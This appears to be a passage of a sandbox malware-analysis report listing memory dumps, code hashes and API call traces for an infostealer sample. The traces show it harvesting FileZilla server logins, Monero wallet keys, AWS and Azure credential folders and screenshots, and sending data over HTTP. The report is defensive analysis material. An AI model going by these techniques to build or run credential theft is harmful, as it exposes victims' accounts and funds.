                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: -?
                        • API String ID: 0-4226073365
                        • Opcode ID: a43d86d1fb8cedc131ed815fa803420f3074802f7b3e70a47caf2eff985819d1
                        • Instruction ID: 6e1a0681cf404b2edb9eafa0738505fd3288ac7187a02a6708462f902b0044b8
                        • Opcode Fuzzy Hash: a43d86d1fb8cedc131ed815fa803420f3074802f7b3e70a47caf2eff985819d1
                        • Instruction Fuzzy Hash: FB8207F360C204AFE3046E2DEC8566AF7E9EF94760F1A4A3DE6C4C7744EA3558048796
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Vy~
                        • API String ID: 0-958377082
                        • Opcode ID: 40aea3346453d6942338c253df8233f178ae36eba1657a83230b6548b213e84b
                        • Instruction ID: 42cd2e8c6d159fc9939caef8a4c21a87f24a72bdc75c14e6382483781008a3eb
                        • Opcode Fuzzy Hash: 40aea3346453d6942338c253df8233f178ae36eba1657a83230b6548b213e84b
                        • Instruction Fuzzy Hash: E1712AB3A0C2048FE3046E69DC9576AFBE6EB84720F1A453DD9C887380EA7558058786
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: U9U=
                        • API String ID: 0-1770593171
                        • Opcode ID: 75c96a3f5dfa41be12d96537542042a6cf7ad9f25b263199656cbbd7c9bd9ca6
                        • Instruction ID: fe5dfba3e470d6315d18f03a0a181a81d662da908d72044d719b391bccda8c2b
                        • Opcode Fuzzy Hash: 75c96a3f5dfa41be12d96537542042a6cf7ad9f25b263199656cbbd7c9bd9ca6
                        • Instruction Fuzzy Hash: 3851BBB39082145BE3147A69EC557BBBB89CFD0360F2A463DEA4593780FC39590582C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: {T3
                        • API String ID: 0-3004263434
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C58E0B
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C499EC
                          • Part of subcall function 00C499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C49A11
                          • Part of subcall function 00C499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C49A31
                          • Part of subcall function 00C499C0: ReadFile.KERNEL32(000000FF,?,00000000,00C4148F,00000000), ref: 00C49A5A
                          • Part of subcall function 00C499C0: LocalFree.KERNEL32(00C4148F), ref: 00C49A90
                          • Part of subcall function 00C499C0: CloseHandle.KERNEL32(000000FF), ref: 00C49A9A
                          • Part of subcall function 00C58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C58E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00C60DBA,00C60DB7,00C60DB6,00C60DB3), ref: 00C50362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C50369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C50385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C50393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C503CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C503DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00C50419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C50427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C50463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C50475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C50502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C5051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C50532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C5054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C50562
                        • lstrcat.KERNEL32(?,profile: null), ref: 00C50571
                        • lstrcat.KERNEL32(?,url: ), ref: 00C50580
                        • lstrcat.KERNEL32(?,00000000), ref: 00C50593
                        • lstrcat.KERNEL32(?,00C61678), ref: 00C505A2
                        • lstrcat.KERNEL32(?,00000000), ref: 00C505B5
                        • lstrcat.KERNEL32(?,00C6167C), ref: 00C505C4
                        • lstrcat.KERNEL32(?,login: ), ref: 00C505D3
                        • lstrcat.KERNEL32(?,00000000), ref: 00C505E6
                        • lstrcat.KERNEL32(?,00C61688), ref: 00C505F5
                        • lstrcat.KERNEL32(?,password: ), ref: 00C50604
                        • lstrcat.KERNEL32(?,00000000), ref: 00C50617
                        • lstrcat.KERNEL32(?,00C61698), ref: 00C50626
                        • lstrcat.KERNEL32(?,00C6169C), ref: 00C50635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C60DB2), ref: 00C5068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C44839
                          • Part of subcall function 00C447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C44849
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C459F8
                        • StrCmpCA.SHLWAPI(?,008A0610), ref: 00C45A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C45B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008A05F0,00000000,?,0089C018,00000000,?,00C61A1C), ref: 00C45E71
                        • lstrlen.KERNEL32(00000000), ref: 00C45E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C45E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C45E9A
                        • lstrlen.KERNEL32(00000000), ref: 00C45EAF
                        • lstrlen.KERNEL32(00000000), ref: 00C45ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C45EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00C45F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C45F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C45F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00C45FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00C45FBD
                        • HttpOpenRequestA.WININET(00000000,008A0720,?,0089FCA0,00000000,00000000,00400100,00000000), ref: 00C45BF8
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • InternetCloseHandle.WININET(00000000), ref: 00C45FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C58B60: GetSystemTime.KERNEL32(00C60E1A,0089C2B8,00C605AE,?,?,00C413F9,?,0000001A,00C60E1A,00000000,?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C58B86
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C4CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C4D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C4D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D208
                        • lstrcat.KERNEL32(?,00C61478), ref: 00C4D217
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D22A
                        • lstrcat.KERNEL32(?,00C6147C), ref: 00C4D239
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D24C
                        • lstrcat.KERNEL32(?,00C61480), ref: 00C4D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D26E
                        • lstrcat.KERNEL32(?,00C61484), ref: 00C4D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D290
                        • lstrcat.KERNEL32(?,00C61488), ref: 00C4D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D2B2
                        • lstrcat.KERNEL32(?,00C6148C), ref: 00C4D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D2D4
                        • lstrcat.KERNEL32(?,00C61490), ref: 00C4D2E3
                          • Part of subcall function 00C5A820: lstrlen.KERNEL32(00C44F05,?,?,00C44F05,00C60DDE), ref: 00C5A82B
                          • Part of subcall function 00C5A820: lstrcpy.KERNEL32(00C60DDE,00000000), ref: 00C5A885
                        • lstrlen.KERNEL32(?), ref: 00C4D32A
                        • lstrlen.KERNEL32(?), ref: 00C4D339
                          • Part of subcall function 00C5AA70: StrCmpCA.SHLWAPI(0089AE68,00C4A7A7,?,00C4A7A7,0089AE68), ref: 00C5AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 00C4D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 2628ec2bc85218778fe9befa4c4e9324e538fe25cb02bcb2b815f4388d8260de
                        • Instruction ID: a27d289d0210b5d8817cdc575fa2b1effe4d628fa72a0be1f9e14a1df94a6d67
                        • Opcode Fuzzy Hash: 2628ec2bc85218778fe9befa4c4e9324e538fe25cb02bcb2b815f4388d8260de
                        • Instruction Fuzzy Hash: 2AE162758101089FDB04EBA2DD96EEE7378BF14302F144265F907B7091EE34AA4DEB66
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0089F380,00000000,?,00C6144C,00000000,?,?), ref: 00C4CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C4CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00C4CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C4CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C4CAD9
                        • StrStrA.SHLWAPI(?,0089F2A8,00C60B52), ref: 00C4CAF7
                        • StrStrA.SHLWAPI(00000000,0089F218), ref: 00C4CB1E
                        • StrStrA.SHLWAPI(?,0089F848,00000000,?,00C61458,00000000,?,00000000,00000000,?,0089AE08,00000000,?,00C61454,00000000,?), ref: 00C4CCA2
                        • StrStrA.SHLWAPI(00000000,0089FB08), ref: 00C4CCB9
                          • Part of subcall function 00C4C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C4C871
                          • Part of subcall function 00C4C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C4C87C
                        • StrStrA.SHLWAPI(?,0089FB08,00000000,?,00C6145C,00000000,?,00000000,0089AD18), ref: 00C4CD5A
                        • StrStrA.SHLWAPI(00000000,0089AF98), ref: 00C4CD71
                          • Part of subcall function 00C4C820: lstrcat.KERNEL32(?,00C60B46), ref: 00C4C943
                          • Part of subcall function 00C4C820: lstrcat.KERNEL32(?,00C60B47), ref: 00C4C957
                          • Part of subcall function 00C4C820: lstrcat.KERNEL32(?,00C60B4E), ref: 00C4C978
                        • lstrlen.KERNEL32(00000000), ref: 00C4CE44
                        • CloseHandle.KERNEL32(00000000), ref: 00C4CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: 39d4adb9366c5e1eba975924900f8d14c3a44226c50f852e683d52840e3fe3db
                        • Instruction ID: e57f9ba344381a2692cbb5eb7de995dab724ee02bf52c915d707b7c22ce92b63
                        • Opcode Fuzzy Hash: 39d4adb9366c5e1eba975924900f8d14c3a44226c50f852e683d52840e3fe3db
                        • Instruction Fuzzy Hash: 4BE1FA75810108AFDB14EBA2DC91FEEB778BF14301F444269F90676191EF306A8EDB66
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • RegOpenKeyExA.ADVAPI32(00000000,0089CE10,00000000,00020019,00000000,00C605B6), ref: 00C583A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C58426
                        • wsprintfA.USER32 ref: 00C58459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C5847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C5848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C58499
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 95b30431bafac1d70161ca97211119768153cde22d35fae4f8ea702abf85fd60
                        • Instruction ID: 10638dadd11a50c84f6258961aac001867c077cfd7a37d3b760b0a61fd39d279
                        • Opcode Fuzzy Hash: 95b30431bafac1d70161ca97211119768153cde22d35fae4f8ea702abf85fd60
                        • Instruction Fuzzy Hash: D6812B759101189FEB28DB51CC95FEA77B8FB08701F008299E509A6180DF756BCDCFA5
                        APIs
                          • Part of subcall function 00C58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C58E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 00C54DCD
                          • Part of subcall function 00C54910: wsprintfA.USER32 ref: 00C5492C
                          • Part of subcall function 00C54910: FindFirstFileA.KERNEL32(?,?), ref: 00C54943
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 00C54E59
                          • Part of subcall function 00C54910: StrCmpCA.SHLWAPI(?,00C60FDC), ref: 00C54971
                          • Part of subcall function 00C54910: StrCmpCA.SHLWAPI(?,00C60FE0), ref: 00C54987
                          • Part of subcall function 00C54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C54B7D
                          • Part of subcall function 00C54910: FindClose.KERNEL32(000000FF), ref: 00C54B92
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C54EE5
                          • Part of subcall function 00C54910: wsprintfA.USER32 ref: 00C549B0
                          • Part of subcall function 00C54910: StrCmpCA.SHLWAPI(?,00C608D2), ref: 00C549C5
                          • Part of subcall function 00C54910: wsprintfA.USER32 ref: 00C549E2
                          • Part of subcall function 00C54910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C54A1E
                          • Part of subcall function 00C54910: lstrcat.KERNEL32(?,008A0710), ref: 00C54A4A
                          • Part of subcall function 00C54910: lstrcat.KERNEL32(?,00C60FF8), ref: 00C54A5C
                          • Part of subcall function 00C54910: lstrcat.KERNEL32(?,?), ref: 00C54A70
                          • Part of subcall function 00C54910: lstrcat.KERNEL32(?,00C60FFC), ref: 00C54A82
                          • Part of subcall function 00C54910: lstrcat.KERNEL32(?,?), ref: 00C54A96
                          • Part of subcall function 00C54910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C54AAC
                          • Part of subcall function 00C54910: DeleteFileA.KERNEL32(?), ref: 00C54B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 26e6b491125db47bd8c11b814747166f3a405b6e102494e19b101767c9ae2639
                        • Instruction ID: adaffb248e495b3e4f45bb5c04b71866197b17c0632473664959908cfb76f8af
                        • Opcode Fuzzy Hash: 26e6b491125db47bd8c11b814747166f3a405b6e102494e19b101767c9ae2639
                        • Instruction Fuzzy Hash: 4741A67A9502086BDB24F770DC87FED3338AB24705F444564BA89660C1FEB45BCD9BA2
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C5906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
